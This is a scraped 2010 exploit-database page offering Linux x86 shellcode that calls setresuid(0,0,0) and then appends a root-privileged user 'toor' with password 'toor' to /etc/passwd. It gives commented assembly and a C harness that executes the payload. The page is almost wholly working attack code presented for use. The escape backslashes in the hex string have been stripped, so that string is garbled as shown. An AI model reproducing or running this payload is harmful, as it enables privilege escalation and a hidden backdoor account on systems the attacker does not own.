[linux/x86] - linux/x86 setreuid(0) and add user with root&#
Posted on 27 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>linux/x86 setreuid(0) and add user with root's priviledges 105 bytes | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 27 Sep 2010 | Exploit category: linux/x86 | Exploit author: xertux | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================== linux/x86 setreuid(0) and add user with root's priviledges 105 bytes ==================================================================== #include <stdio.h> /* * Title : linux x86 shellcode setreuid(0, 0) and add an user with root's priviledges on /etc/passwd, 105 bytes * Author : xertux * Platform: Linux X86 * Description : setuid(0) + open(/etc/passwd, e0x441, 0x180) + write(fd, toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh , 34) + close(fd) * Add an user "toor" with password "toor" and the root's priviledges at the end of "/etc/passwd" * Size : 105 bytes * */ /* BITS 32 ;setresuid(0,0) xor eax, eax ; eax become 0 xor ebx, ebx ; ebx become 0 xor ecx, ecx ; ecx become 0 cdq ; edx become 0 mov al, 0xa4 ; put call system 164 into eax int 0x80 ; execute setresuid(0,0,0) ;open(/etc/passwd, e0x441, 0x180) push edx ; null string termination push 0x64777373 ; push "sswd" push 0x61702f2f ; push "//pa" push 0x6374652f ; push "/etc" mov ebx, esp ; put "/etc//passwd" into ebx mov WORD cx, 0x441 ; put the O_WRONLY | O_APPEND | O_CREATE argument mov WORD dx, 0x180 ; put the S_IRUSR | S_IWUSR argument push BYTE 0x5 ; put call system open on the stack pop eax ; get the system call number and insert into eax int 0x80 ; execute open(/etc//passwd, O_WRONLY | O_APPEND, S_IRUSR | S_IWUSR) ;write(fd, toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh , 34) ==> pass "toor" mov ebx, eax ; put the file descriptor return by open into ebx xor eax, eax ; eax become 0 push eax ; null termination string push WORD 0x0a68 ; push "h " push 0x732f6e69 ; push "in/s" push 0x622f3a2f ; push "/:/b" push 0x3a3a303a ; push ":0::" push 0x303a5548 ; push "HU:0" push 0x7a693272 ; push "r2iz" push 0x71337a44 ; push "Dz3q" push 0x2e66473a ; push ":Gf." push 0x726f6f74 ; push "toor" mov ecx, esp ; put "toor:toor:0:0::/:/bin/sh " into ebx push BYTE 34 ; put the size of line written on the stack pop edx ; get the size into edx mov al, 0x4 ; put the call system write into eax int 0x80 ; execute write(fd, toor:toor:0:0::/:/bin/sh , 34) ;close(fd) push BYTE 0x6 ; put the call system close on the stack pop eax ; put the call system number into eax int 0x80 ; execute close(fd) */ char shellcode[] = "x31xc0x31xdbx31xc9x99xb0xa4xcdx80x52x68x73x73x77" "x64x68x2fx2fx70x61x68x2fx65x74x63x89xe3x66xb9x41" "x04x66xbax80x01x6ax05x58xcdx80x89xc3x31xc0x50x66" "x68x68x0ax68x69x6ex2fx73x68x2fx3ax2fx62x68x3ax30" "x3ax3ax68x48x55x3ax30x68x72x32x69x7ax68x44x7ax33" "x71x68x3ax47x66x2ex68x74x6fx6fx72x89xe1x6ax22x5a" "xb0x04xcdx80x6ax06x58xcdx80"; int main() { printf("[*] Shellcode - length: %d ", strlen(shellcode)); (*(void(*)())shellcode)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-27]</pre></body></html>
